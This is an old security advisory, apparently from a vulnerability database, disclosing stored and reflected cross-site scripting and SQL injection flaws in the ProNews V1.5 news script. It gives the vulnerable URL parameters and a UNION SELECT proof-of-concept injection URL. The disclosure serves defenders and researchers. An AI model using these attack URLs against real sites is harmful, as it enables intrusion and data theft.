Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15354
HistoryDec 10, 2006 - 12:00 a.m.

ProNews V1.5 XSS & SQL Injection

2006-12-1000:00:00
vulners.com
31

ProNews V1.5

Vendor site: http://www.scripthp.com/
Product: ProNews V1.5
Vulnerability: XSS & SQL Injection Vulnerability
Credits: Mr_KaLiMaN
Reported to Vendor: 01.12.06
Public disclosure: 09.12.06

Description:

XSS permanent:
http://[victim]/[script_news_path]/admin/change.php?pseudo=[XSS]&email=">[XSS]&date=[XSS]&sujet=[XSS]&message=[XSS]&site=">[XSS]<foo
&lien=[XSS]&aa=[existing_news_id]

XSS non permanent:
http://[victim]/[script_news_path]/lire-avis.php?aa=[XSS]

SQL Injection Vulnerability:
http://[victim]/[script_news_path]/lire-avis.php?aa=[SQL INJECTION]
POC: http://[victim]/[script_news_path]/lire-avis.php?aa=1 UNION SELECT null,null,null,null,null FROM
[existing_table]–